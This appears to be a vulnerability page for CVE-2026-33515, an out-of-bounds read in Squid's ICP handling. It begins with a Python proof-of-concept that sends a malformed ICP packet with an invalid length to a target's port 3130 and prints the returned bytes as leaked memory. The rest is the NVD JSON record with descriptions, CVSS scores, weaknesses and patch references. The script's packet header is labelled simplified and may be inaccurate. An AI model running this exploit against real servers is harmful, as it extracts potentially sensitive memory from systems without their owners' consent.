CVE-2026-33515

import socket import struct # PoC for CVE-2026-33515: Squid ICP Out-of-bounds Read # This script sends a malformed ICP packet to trigger the vulnerability. TARGET_IP = "192.168.1.100" ICP_PORT = 3130 # Default ICP port def create_malformed_icp_packet(): # ICP Header structure (simplified) # opcode, version, length, number, timestamp ... # Sending a crafted packet with invalid length to trigger OOB read header = struct.pack("!BBHI", 2, 3, 0xFFFF, 1) # Opcode 2 (QUERY), Invalid length payload = b"A" * 50 return header + payload def send_exploit(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) payload = create_malformed_icp_packet() sock.sendto(payload, (TARGET_IP, ICP_PORT)) print(f"[+] Malformed ICP packet sent to {TARGET_IP}:{ICP_PORT}") # Wait for response (might contain memory leak) data, addr = sock.recvfrom(1024) print(f"[+] Received response from {addr}: {data.hex()}") print("[+] Check memory dump in response for sensitive data.") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": send_exploit()

{"cve": {"id": "CVE-2026-33515", "sourceIdentifier": "[email protected]", "published": "2026-03-26T01:16:27.690", "lastModified": "2026-03-31T01:22:04.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Squid is a caching proxy for the Web. Prior to version 7.5, due to improper input validation, Squid is vulnerable to out of bounds read when handling ICP traffic. This problem allows a remote attacker to receive small amounts of memory potentially containing sensitive information when responding with errors to invalid ICP requests. This attack is limited to Squid deployments that explicitly enable ICP support (i.e. configure non-zero `icp_port`). This problem cannot be mitigated by denying ICP queries using `icp_access` rules. Version 7.5 contains a patch."}, {"lang": "es", "value": "Squid es un proxy de caché para la Web. Antes de la versión 7.5, debido a una validación de entrada incorrecta, Squid es vulnerable a una lectura fuera de límites al manejar tráfico ICP. Este problema permite a un atacante remoto recibir pequeñas cantidades de memoria que potencialmente contienen información sensible al responder con errores a solicitudes ICP no válidas. Este ataque se limita a implementaciones de Squid que habilitan explícitamente el soporte ICP (es decir, configuran un 'icp_port' distinto de cero). Este problema no puede mitigarse denegando consultas ICP utilizando reglas de 'icp_access'. La versión 7.5 contiene un parche."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-1289"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.5", "matchCriteriaId": "9F62FE66-3319-4718-BD42-B374264D81E8"}]}]}], "references": [{"url": "https://github.com/squid-cache/squid/commit/8138e909d2058d4401e0ad49b583afaec912b165", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/squid-cache/squid/pull/2220", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/squid-cache/squid/pull/2220#discussion_r2727683637", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/squid-cache/squid/security/advisories/GHSA-84p4-hcx7-jj7c", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/25/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory", "Mailing List"]}]}}